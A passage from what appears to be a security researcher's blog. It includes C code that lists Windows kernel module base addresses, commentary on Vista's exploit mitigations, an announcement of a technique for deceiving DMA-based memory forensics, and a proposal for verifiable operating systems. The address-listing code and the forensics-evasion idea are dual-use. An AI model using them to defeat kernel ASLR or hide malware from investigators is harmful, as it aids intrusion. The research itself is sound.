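typedef struct _MODULE_INFO {
    PVOID  Reserved[2];
    PVOID  ImageBase;
    ULONG  ImageSize;
    ULONG  Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR  FullPathName[256];
} MODULE_INFO;

typedef struct _MODULES {
    ULONG       NumberOfModules;
    MODULE_INFO Modules[1];
} MODULES;

typedef LONG (WINAPI *NTQSI)(ULONG, PVOID, ULONG, PULONG);
#define SystemModuleInformation 11

int main(void)
{
    static char buf[1024 * 1024];     // should be big enough for the list
    MODULES *mods = (MODULES *)buf;
    ULONG i, ret = 0;
    NTQSI pNtQSI = (NTQSI)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                         "NtQuerySystemInformation");

    if (!pNtQSI || pNtQSI(SystemModuleInformation, buf, sizeof(buf), &ret) < 0)
        return 1;
    for (i = 0; i < mods->NumberOfModules; i++)
        printf("%p %s\n", mods->Modules[i].ImageBase,
               (char *)mods->Modules[i].FullPathName +
               mods->Modules[i].OffsetToFileName);
    return 0;
}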

UPDATE (see above): David Solomon pointed out that hardware DEP is also available on many modern 32-bit processors (as the NX bit is implemented in PAE mode).

It’s very good that Microsoft implemented those anti-exploitation technologies (besides ASLR and NX, there are also some others). However, the point is that they could be bypassed by a clever attacker under some circumstances. Now think about how many 3rd party kernel drivers are typically present in an average Windows system – all those graphics card drivers, audio drivers, SATA drivers, A/V drivers, etc. – and try answering the question of how many possible bugs could be there. (BTW, it should be mentioned that Microsoft made a clever move by putting some classes of kernel drivers into user mode, like e.g. USB drivers – this is called UMDF.)

When an attacker successfully exploits a kernel bug, the whole security scheme implemented by the OS is worth nothing. So, what can we do? Well, we need to complement all those cool prevention technologies with effective detection technology. But has Microsoft done anything to make systematic detection possible? This is a rhetorical question, of course, and the negative answer unfortunately applies not only to Microsoft products but also to all other general purpose operating systems I’m aware of :(

My favorite quote from all those people who negate the value of detection is this: “once the system is compromised we can’t do anything!”. BS! It might be true today – because operating systems are not designed to be verifiable – but that doesn’t mean we can’t change this!

Bottom Line

Microsoft did a good job with securing Vista. They could have done better, of course, but remember that Windows is a system for the masses and that they need to take care of compatibility issues, which can sometimes be a real pain. If you want to run a Microsoft OS, then I believe that Vista is definitely a better choice than XP from a security standpoint. It has bugs, but which OS doesn’t? What I wish for is that they paid more attention to making their system verifiable...

Acknowledgements

I would like to thank John Lambert and Andrew Roths, both of Microsoft, for answering my questions about UAC design.

Saturday, January 20, 2007

Beyond The CPU: Cheating Hardware Based RAM Forensics


We all know that any software-based system compromise detector can always be cheated if malware runs at the same privilege level as the detector (usually both run in kernel mode). This is what I call Implementation Specific Attacks (ISA). Because of that, mankind has tried to find some better, more reliable ways for analyzing systems, which would not be subject to interference from malware…

And we all know what we’ve come up with as a solution – hardware based devices for obtaining the image of volatile memory (RAM), usually in the form of a PCI card. As far as the PC architecture is concerned, probably the first two papers in this area are those about Tribble and CoPilot. As an alternative to expensive dedicated PCI cards, one can also use the FireWire bus, as described by Maximillian Dornseif et al., and later by Adam Boileau.

The point is: once we get the memory image, we can analyze it for signs of compromise on a trusted machine, or we can have the PCI device do some checks itself (like e.g. CoPilot does).

The whole idea behind hardware-based RAM acquisition is that the device uses Direct Memory Access (DMA) to read the physical memory. DMA, as the name suggests, does not involve the CPU in the process of accessing memory. So, it seems to be a very reliable way of reading the physical memory…

But it is not! At least in some cases...

Next month, at Black Hat DC, I will be demonstrating how to cheat hardware-based memory acquisition on AMD-based systems. In other words, I will be showing that the image obtained using DMA can be made different from the real contents of the physical memory as seen by the CPU. Even though the attack is AMD-specific, it does not rely on virtualization extensions. Also, the attack does not require a system reboot. Nor does it require soldering ;)

I have tested my proof-of-concept code against a FireWire-based method of memory acquisition, using tools from Adam Boileau’s presentation.

I also wanted to test it against some PCI cards, but it turned out that, for an ordinary mortal like myself, it is virtually impossible to buy a sample of a dedicated PCI card for memory acquisition… E.g. the Tribble card is still unavailable for sale, according to its author, even though the prototype was built in 2003... BBN, the US company known for doing lots of projects for the US government, apparently has a prototype (see page 45) of something similar to Tribble, but is not willing to discuss any details with somebody who is not involved in a project with the US government... Finally, Komoku Inc., whose main customers, according to its website, are also US government agencies, also rejected my inquiry about buying a sample of CoPilot, claiming that the device "is not generally available right now" ;)

Anyway, even though I was able to test the attack only against the FireWire-based method, I’m pretty confident that it will work against all other devices which use DMA to access the physical memory, as the attack itself is very generic.

See you in DC!

Wednesday, January 03, 2007

Towards Verifiable Operating Systems

Last week I gave a presentation at the 23rd Chaos Communication Congress in Berlin. Originally the presentation was supposed to be titled "Stealth malware - can good guys win?", but at the very last moment I decided to redesign it completely and gave it a new title: "Fighting Stealth Malware – Towards Verifiable OSes". You can download it from here.

The presentation first debunks The 4 Myths About Stealth Malware Fighting that surprisingly many people believe in. Then my stealth malware classification is briefly described, presenting malware of type 0, I and II and the challenges with detecting them (mainly type II). Finally, I talk about what changes to OS design are needed to make our systems verifiable. If OSes were designed that way, then detection of type I and type II malware would be a trivial task...

There are only four requirements that an OS must satisfy to become easily verifiable; these are:
  1. The underlying processors must support a non-executable attribute at a per-page level,

  2. The OS design must maintain strong code and data separation on a per-page level (this could at first apply only to the kernel and later be extended to include sensitive applications),

  3. All code sections should be verifiable on a per-page level (usually this means implementing some signing or hashing scheme),

  4. The OS must allow a 3rd party application (kernel driver/module) to safely read physical memory and, for each page, to reliably determine whether it is executable or not.

The first three requirements are becoming more and more popular these days in various operating systems, as a side effect of introducing anti-exploitation/anti-malware technologies (which is a good thing, BTW). However, the 4th requirement presents a big challenge, and it is not yet clear whether it would be feasible on some architectures. A sketch of how a verifier could make use of these properties is given below.
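Just to illustrate what I have in mind, here is a purely hypothetical sketch of what a memory verifier could look like on a system satisfying all four requirements – the stubbed-out primitives stand for exactly the interfaces that requirements #3 and #4 would have to provide (no OS offers them today):

#include <stdio.h>
#include <string.h>

/* Hypothetical sketch only. The three "primitives" below are placeholders
   for what requirement #4 (safe physical memory access, per-page
   executability) and requirement #3 (a hashing/signing scheme) would have
   to provide - they do not exist in any OS today, so they are stubbed out. */
#define PAGE_SIZE 4096

static int read_physical_page(unsigned long pfn, unsigned char *buf)
{   /* placeholder for the requirement #4 interface */
    (void)pfn; memset(buf, 0, PAGE_SIZE); return 1;
}
static int is_page_executable(unsigned long pfn)
{   /* placeholder for the requirement #4 interface */
    return (pfn % 16) == 0;
}
static int known_good_hash(const unsigned char *page)
{   /* placeholder for the requirement #3 hashing/signing scheme */
    (void)page; return 1;
}

unsigned long verify_memory(unsigned long total_pfns)
{
    unsigned char page[PAGE_SIZE];
    unsigned long pfn, suspicious = 0;

    for (pfn = 0; pfn < total_pfns; pfn++) {
        if (!is_page_executable(pfn))
            continue;                  /* req. #1/#2: data pages cannot hide code */
        if (!read_physical_page(pfn, page))
            return (unsigned long)-1;  /* the verifier must never be lied to */
        if (!known_good_hash(page)) {  /* req. #3: every code page is accounted for */
            printf("unknown executable page at pfn %lu\n", pfn);
            suspicious++;
        }
    }
    return suspicious;                 /* 0 means: no unknown code hiding in memory */
}

int main(void) { return (int)verify_memory(1024); }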

Still, I think that it's possible to redesign our systems in order to make them verifiable. If we don't do that, then we will always have to rely on a bunch of "hacks" to check for some known rootkits, and we will be taking part in an endless arms race with the bad guys. On the other hand, such a situation is very convenient for the security vendors, as they can always improve their "Advanced Rootkit Detection Technology" and sell some updates... ;)

Happy New Year!